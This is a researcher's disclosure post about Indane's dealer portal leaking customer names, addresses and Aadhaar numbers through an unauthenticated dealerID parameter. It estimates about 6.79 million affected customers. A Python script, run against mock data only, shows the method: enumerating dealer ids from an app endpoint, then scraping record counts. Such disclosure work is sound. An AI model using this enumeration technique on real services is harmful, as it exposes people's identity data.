Indane leaked Aadhaar numbers: 6,700,000 Aadhaar numbers


On February 10, I received a very interesting private message on Twitter.


There are “Aadhaar” and “leak” in the same sentence; this guy managed to get my interest. After a few messages, he sent me a URL.


This page contains a lot of juicy information:

  • The hyperlink associated with the “Consumer No” contains a parameter called “aadhar_no”
  • The “Consumer Name”
  • The “Consumer Address”
  • On the bottom right we have the “Total Records”
  • In the URL, there is a parameter called dealerID

So, due to a lack of authentication in the local dealer portal, Indane is leaking the names, addresses and Aadhaar numbers of its customers. But how big is this leak?

This is the dealer portal, so if we modify the value of the dealerID parameter, we can access the consumer info of another dealer: a textbook insecure direct object reference, since the id in the URL is the only thing that selects whose records are shown. So, to get the size of this leak, we need the ids of the Indane dealers.


According to Wikipedia, Indane serves more than 90 million families through a network of 9100 distributors. Wow, we have a story here; I definitely need to investigate more.

Oh, they have an Android app; it could be interesting to look at it too.


In their app, there is the possibility to “Locate Your Distributor”. What is happening under the hood?


Bingo! When I use the “Locate Your Distributor” feature, the server sends the dealer ids of the corresponding “bgadistrict”. With the dichotomy method (a binary search on the district id) I easily found that there are 714 bgadistricts.

Great, time to code! We have everything we need to get the size of this leak. Thanks to the endpoint found in the Android app, we will obtain all the valid dealer ids, and then we will scrape every “Total Records” count from the local dealer portal.


After a few minutes, I wrote this Python script. Running it gives us 11062 valid dealer ids. After more than a day, my script had tested 9490 dealers and found that a total of 5,826,116 Indane customers are affected by this leak.

Unfortunately, Indane probably blocked my IP, so I didn’t test the remaining 1572 dealers. By doing some basic math (5,826,116 records over 9490 dealers, scaled to all 11062) we can estimate the final number of affected customers at around 6,791,200.
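To make the enumerate-then-scrape procedure concrete, here is an added example of my own; it is not the post’s script, which the page only shows as screenshots. It runs offline against two in-memory stand-ins for the endpoints (the app’s district lookup and the dealer portal page), so the response markup, the helper names, the assumption that district ids are contiguous from 1, and the sample counts are all mine; the post only gives the parameter names bgadistrict and dealerID and the “Total Records” field. The four pieces the post describes are here: the binary search for the number of districts, collecting dealer ids across districts, summing “Total Records” per dealer, and extrapolating when the scan is cut off early.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed mock data (assumption): district id -> dealer ids, as the app's
# "Locate Your Distributor" endpoint would return for a "bgadistrict" value.
MOCK_DISTRICTS: Dict[int, List[int]] = {
    1: [1001, 1002],
    2: [2001],
    3: [3001, 3002, 3003],
}
# Constructed mock data (assumption): dealer id -> "Total Records" on its page.
MOCK_TOTAL_RECORDS: Dict[int, int] = {
    1001: 520, 1002: 310, 2001: 1200, 3001: 75, 3002: 0, 3003: 990,
}


def mock_locate(bgadistrict: int) -> List[int]:
    """Stand-in for the app endpoint (assumed shape): dealer ids of a district."""
    return list(MOCK_DISTRICTS.get(bgadistrict, []))


def mock_portal(dealer_id: int) -> str:
    """Stand-in for the dealer portal page (assumed markup, keyed on dealerID)."""
    total = MOCK_TOTAL_RECORDS.get(dealer_id)
    if total is None:
        return "<html><body>No records found</body></html>"
    return f"<html><body><span>Total Records: {total}</span></body></html>"


def count_districts(locate: Callable[[int], List[int]], upper: int = 1 << 16) -> int:
    """Binary search (the post's "dichotomy method") for the largest district id
    that still returns dealers, assuming ids are contiguous from 1."""
    lo, hi = 0, upper
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if locate(mid):
            lo = mid          # mid exists: the answer is mid or higher
        else:
            hi = mid - 1      # mid is empty: the answer is below mid
    return lo


def collect_dealer_ids(locate: Callable[[int], List[int]], n_districts: int) -> List[int]:
    """Walk every district once and de-duplicate the dealer ids."""
    ids = set()
    for district in range(1, n_districts + 1):
        ids.update(locate(district))
    return sorted(ids)


TOTAL_RE = re.compile(r"Total Records:\s*(\d+)")


def total_records(portal: Callable[[int], str], dealer_id: int) -> Optional[int]:
    """Scrape the "Total Records" count from one dealer's page, None if absent."""
    match = TOTAL_RE.search(portal(dealer_id))
    return int(match.group(1)) if match else None


def count_exposed(portal: Callable[[int], str], dealer_ids: List[int],
                  stop_after: Optional[int] = None) -> Tuple[int, int]:
    """Sum "Total Records" over dealers. Returns (dealers tested, records seen).
    stop_after models the scan ending early, e.g. when the source IP gets blocked."""
    tested = total = 0
    for index, dealer_id in enumerate(dealer_ids):
        if stop_after is not None and index >= stop_after:
            break
        tested += 1
        count = total_records(portal, dealer_id)
        if count is not None:
            total += count
    return tested, total


def extrapolate(tested: int, total: int, n_dealers: int) -> int:
    """Scale the per-dealer average seen so far up to every known dealer."""
    return round(total / tested * n_dealers) if tested else 0


if __name__ == "__main__":
    n = count_districts(mock_locate)
    dealers = collect_dealer_ids(mock_locate, n)
    tested, seen = count_exposed(mock_portal, dealers, stop_after=3)
    print(f"{n} districts, {len(dealers)} dealers, {tested} tested, {seen} records seen")
    print("estimate for all dealers:", extrapolate(tested, seen, len(dealers)))
    # The post's own numbers: 5,826,116 records over 9490 of 11062 dealers
    print("post's estimate:", extrapolate(9490, 5_826_116, 11062))
```

The binary search only works because an empty district response is a clean “no such id” signal and the ids have no holes; against a real service you would also want a back-off between requests, which is exactly the kind of rate control the portal itself should have been enforcing on an unauthenticated endpoint.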

Summary

  • Due to a lack of authentication in the local dealer portal (any dealerID can be requested), Indane is leaking the names, addresses and Aadhaar numbers of its customers
  • Indane has 11062 dealers
  • The total number of affected customers is around 6,791,200

Timeline

02/10/19: Anonymous tip from a Twitter follower
02/15/19: Disclosure to Indane
02/19/19: Indane didn’t answer. Public disclosure.

Coverage